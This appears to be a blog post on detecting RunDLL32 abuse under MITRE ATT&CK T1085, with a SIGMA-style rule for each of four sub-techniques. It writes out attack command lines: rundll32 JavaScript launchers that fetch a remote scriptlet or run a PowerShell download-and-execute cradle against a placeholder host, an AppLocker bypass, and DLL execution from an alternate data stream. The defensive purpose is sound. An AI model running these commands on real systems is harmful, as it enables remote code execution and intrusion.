Detecting RunDLL32 ATT&CK Techniques

Launching a strange binary file on a target endpoint is a good way to raise alarm bells within the target organization’s SOC. One of the more common #LOLBINS we see is to use RunDLL32.exe to execute malicious DLL files. This technique is well documented in MITRE’s ATT&CK framework under T1085.

In this post, we look at detection approaches for 4 sub-techniques. In each case the assumption is that you are logging command execution with Sysmon or at least EventID 4688 (process execution with command lines).

Note: Credit for items #1 and #2 goes to the brilliant folks at https://lolbasproject.github.io/lolbas.

SubTechnique 1 – Javascript ActiveX Objects

Executing simple Javascript downloader.
This behavior has been used by malware such as Poweliks.

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" 

Executing Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

Using Rundll32.exe to execute a JavaScript script that runs calc.exe. This will bypass AppLocker even if calc.exe is not on the allowed list.

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

Executing Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

SIGMA Friendly Detection Logic:

image=rundll32.exe AND commandLine=”*ActiveXObject*”  OR   commandLine=”*WScript.Shell*” OR commandLine=”*RunHTMLApplication*”

SubTechnique 2 – Alternate data streams

Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).

rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain

SIGMA Friendly Detection Logic:

image=rundll32.exe  | regex commandLine=”/^rundll32.+\:.+\..+$/”

SubTechnique 3 – Point Function Call

RunDll32 can be used to launch an executable via the PointFunctionCall operation. This technique was used by a suspected APT group (APT29).

"C:\Windows\system32\rundll32.exe"  C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

SIGMA Friendly Detection Logic:

image=rundll32.exe  AND commandLine=”*PointFunctionCall*”

SubTechnique 4 – Network HTTP(s) call for additional payloads

Rundll32 can be used to launch a custom DLL that pulls down malware from the internet. The example below is used by Slimware PUA.

Rundll32.exe "C:\Users\*\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll",A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua="(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)" -ul=https://anx.mindspark.com/anx.gif?anxa=%251&anxe=%252&anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&anxtv=2.7.1.3000&anxp=^CPW^xdm373^TTAB02^us&anxsi=&anxv=%253&anxd=2020-04-01&anxr=%254 -hu=SHOW

SIGMA Friendly Detection Logic:

image=rundll32.exe  (commandLine=”*\\users\\*http*.” AND NOT commandLine=*yourdomain.com*)

References:

– https://lolbas-project.github.io/lolbas/Binaries/Rundll32
– https://attack.mitre.org/techniques/T1085/
– https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s